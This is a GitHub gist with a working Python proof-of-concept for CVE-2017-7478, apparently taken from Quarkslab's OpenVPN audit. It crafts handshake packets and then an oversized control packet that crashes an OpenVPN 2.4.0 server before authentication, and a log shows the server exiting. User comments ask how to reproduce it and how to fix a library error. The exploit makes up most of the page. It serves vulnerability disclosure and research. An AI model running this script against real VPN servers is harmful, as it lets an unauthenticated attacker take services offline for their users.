Created
May 12, 2017 12:06
-
-
Save x0rz/76fd72806134ab97c937f72968972bce to your computer and use it in GitHub Desktop.
CVE-2017-7478: Proof of Concept Code for the OpenVPN Pre-Authentication DoS Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Script by Quarkslab from https://ostif.org/wp-content/uploads/2017/05/OpenVPN1.2final.pdf | |
""" | |
$ ./dos_server.py & | |
$ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf | |
... | |
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1 | |
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf)) | |
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error | |
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask␣255.255.255.0 | |
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Closing TUN/TAP interface | |
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/ifconfig tun0 0.0.0.0 | |
""" | |
import binascii | |
import os | |
import socket | |
from construct import * | |
HOST, PORT = "192.168.149.1", 1194 | |
SessionID = Bytes(8) | |
PControlV1 = Struct( | |
"packet_id" / Int32ub, | |
"data" / GreedyBytes | |
) | |
PAckV1 = Struct( | |
"remote_session_id" / SessionID | |
) | |
PControlHardResetClientV2 = Struct( | |
"packet_id" / Int32ub | |
) | |
PControlHardResetServerV2 = Struct( | |
"remote_session_id" / SessionID, | |
"packet_id" / Int32ub | |
) | |
OpenVPNPacket = Struct( | |
EmbeddedBitStruct( | |
"opcode" / Enum(BitsInteger(5), | |
P_CONTROL_HARD_RESET_CLIENT_V1=1, | |
P_CONTROL_HARD_RESET_SERVER_V1=2, | |
P_CONTROL_HARD_RESET_CLIENT_V2=7, | |
P_CONTROL_HARD_RESET_SERVER_V2=8, | |
P_CONTROL_SOFT_RESET_V1=3, | |
P_CONTROL_V1=4, | |
P_ACK_V1=5, | |
P_DATA_V1=6), | |
"key_id" / BitsInteger(3) | |
), | |
"session_id" / SessionID, | |
"ack_packets" / PrefixedArray(Int8ub, Int32ub), | |
Embedded(Switch(this.opcode, | |
{ | |
"P_CONTROL_V1": PControlV1, | |
"P_ACK_V1": PAckV1, | |
"P_CONTROL_HARD_RESET_CLIENT_V2": PControlHardResetClientV2, | |
"P_CONTROL_HARD_RESET_SERVER_V2": PControlHardResetServerV2 | |
})) | |
) | |
def main(): | |
session_id = os.urandom(8) | |
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
reset_client = OpenVPNPacket.build({ | |
"opcode": "P_CONTROL_HARD_RESET_CLIENT_V2", | |
"key_id": 0, | |
"session_id": session_id, | |
"ack_packets": [], | |
"packet_id": 0}) | |
sock.sendto(reset_client, (HOST, PORT)) | |
data, addr = sock.recvfrom(8192) | |
reset_server = OpenVPNPacket.parse(data) | |
remote_session_id = reset_server.session_id | |
# ack server packet | |
ack_packet = OpenVPNPacket.build({ | |
"opcode": "P_ACK_V1", | |
"key_id": 0, | |
"session_id": session_id, | |
"ack_packets": [reset_server.packet_id], | |
"remote_session_id": remote_session_id | |
}) | |
sock.sendto(ack_packet, (HOST, PORT)) | |
control_packet = OpenVPNPacket.build({ | |
"opcode": "P_CONTROL_V1", | |
"key_id": 0, | |
"session_id": session_id, | |
"ack_packets": [], | |
"packet_id": 1, | |
"data": b"a" * 2048}) | |
sock.sendto(control_packet, (HOST, PORT)) | |
if __name__ == '__main__': | |
main() |
Hi can i ask how to replicate the vulnerabilities on virtual machines?
Use an earlier version of contstruct to get this to work
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hi, do you mind explaining how the code works? I'm new to this and i'm doing a school assignment for OpenVPN. Thanks
I have an error on line 22 SessionID = Bytes(8) which says take in 2 arg please advise.